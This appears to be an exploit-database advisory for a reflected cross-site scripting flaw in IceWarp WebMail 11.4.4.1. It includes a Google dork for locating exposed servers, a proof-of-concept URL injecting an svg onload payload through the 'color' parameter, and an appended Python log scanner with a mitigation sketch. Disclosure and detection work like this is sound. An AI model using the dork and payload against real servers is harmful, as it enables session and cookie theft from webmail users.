IceWarp WebMail 11.4.4.1 – Reflective Cross-Site Scripting

  • Author: Lutfu Mert Ceylan
    Date: 2020-02-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47988/
# Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
# Date: 2020-01-27
# Author: Lutfu Mert Ceylan
# Vendor Homepage: www.icewarp.com
# Tested on: Windows 10
# Versions: 11.4.4.1 and before
# Vulnerable Parameter: "color" (GET method)
# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server
# CVE: CVE-2020-8512

# Notes:

# An attacker can use XSS (in the "color" parameter of IceWarp WebMail 11.4.4.1
# and before) to send a malicious script to unsuspecting admins or users. The
# admin's or user's browser has no way to know that the script should not be
# trusted and will execute it. Because the browser thinks the script came from
# a trusted source, the malicious script can access any cookies, session
# tokens, or other sensitive information retained by the browser and used with
# that site. These scripts can even rewrite the content of the HTML page. An
# attacker can also use this vulnerability for social engineering, for
# example by injecting a fake form field.

# PoC:

# Go to the sign-in page through this path: http://localhost/webmail/ or
http://localhost:32000/webmail/

# Add the "color" parameter to the URL and write malicious code, example:
http://localhost/webmail/?color="><svg/onload=alert(1)>

# When the user goes to the URL, the malicious code is executed.

Example Vulnerable URL: http://localhost/webmail/?color="><svg/onload=alert(1)>
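For defenders, the points to take from this advisory are that the reflected value is a single GET parameter on a fixed path and that the payload has to break out of an attribute with markup characters. The following is an added example, not part of the advisory or IceWarp's code: it scans constructed Common Log Format lines for /webmail/ requests whose "color" value carries markup, and shows the kind of allow-list plus output encoding that would have prevented the reflection (the colour-token pattern and log format are assumptions).

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format); not real traffic.
# The second line carries the percent-encoded form of the advisory's payload.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jan/2020:10:01:02 +0000] "GET /webmail/?color=blue HTTP/1.1" 200 512
10.0.0.9 - - [27/Jan/2020:10:01:09 +0000] "GET /webmail/?color=%22%3E%3Csvg/onload%3Dalert(1)%3E HTTP/1.1" 200 512
10.0.0.7 - - [27/Jan/2020:10:02:15 +0000] "GET /webmail/?color=%23336699 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Any of these characters is enough to close an HTML attribute or open a tag,
# which is what the "><svg/onload=...> payload relies on.
MARKUP_CHARS = re.compile(r'[<>"\']')


def color_values(target):
    """Return the percent-decoded values of the 'color' parameter of a request target."""
    query = urlsplit(target).query
    return parse_qs(query, keep_blank_values=True).get("color", [])


def suspicious_requests(log_text):
    """Return (client ip, decoded color value) for /webmail/ requests whose color value contains markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not urlsplit(m.group("target")).path.startswith("/webmail/"):
            continue
        for value in color_values(m.group("target")):
            if MARKUP_CHARS.search(value):
                hits.append((m.group("ip"), value))
    return hits


def safe_color_attribute(value):
    """Mitigation (assumed design): accept only a hex colour or a short colour name,
    fall back to a fixed default otherwise, and HTML-escape before echoing into markup."""
    if not re.fullmatch(r"#[0-9a-fA-F]{6}|[a-zA-Z]{1,20}", value):
        value = "default"
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent color={value!r} -> would be rendered as {safe_color_attribute(value)!r}")
```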